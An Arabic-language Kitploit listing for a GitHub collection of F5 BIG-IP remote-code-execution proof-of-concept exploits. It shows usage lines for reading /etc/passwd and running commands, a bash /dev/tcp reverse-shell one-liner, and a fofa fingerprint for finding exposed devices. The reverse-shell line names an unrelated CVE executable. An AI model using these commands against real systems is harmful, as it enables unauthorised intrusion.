Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
F5-BIG-IP-POC — CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 مجموعة POC | Kitploit
أدوات/GitHubGitHub/west9b/f5-big-ip-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubwest9b/f5-big-ip-poc

F5-BIG-IP-POC

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 مجموعة POC

عرض المستودع
102منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

F5-BIG-IP POC

مكتوب بلغة Go، مجموعة POCs للثغرات CVE-2020-5902 وCVE-2021-22986 وCVE-2022-1388، وسيتم إضافة POCs أخرى لـ F5 لاحقًا

المؤلف:160team.west9B

للاستخدام فقط من قبل باحثي الأمن بعد الحصول على إذن، مع الالتزام بقانون الأمن السيبراني. أي مشاكل تنشأ تكون على مسؤولية المستخدم ولا علاقة للمؤلف بها.

01-مقدمة أساسية

مجموعة POCs الخاصة بـ F5:

CVE-2020-5902:ثغرة تنفيذ التعليمات البرمجية عن بُعد في F5 BIG-IP

CVE-2021-22986:ثغرة تنفيذ أوامر عن بُعد غير مصرح بها في iControl REST الخاص بـ F5 BIG-IP

CVE-2022-1388:تنفيذ أوامر عن بُعد عبر تجاوز المصادقة

02-تعليمات الاستخدام

الاستخدام: ./F5-BIG-IP -u url

التحقق من CVE-2020-5902 يستخدم تنزيل ملف تعسفي، وإذا تم إرجاع /etc/passwd فإن الثغرة موجودة

POC الخاص بـ CVE-2021-22986 وCVE-2022-1388 ينفذ افتراضيًا أمر id، وإذا تم إرجاع {id} فإن الثغرة موجودة، ويمكن استخدام -c لتخصيص الأمر

الشل العكسي

الاستخدام: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

لقطات الشاشة

Image text Image text

fofa

icon_hash="-335242539"

تنزيل الأداة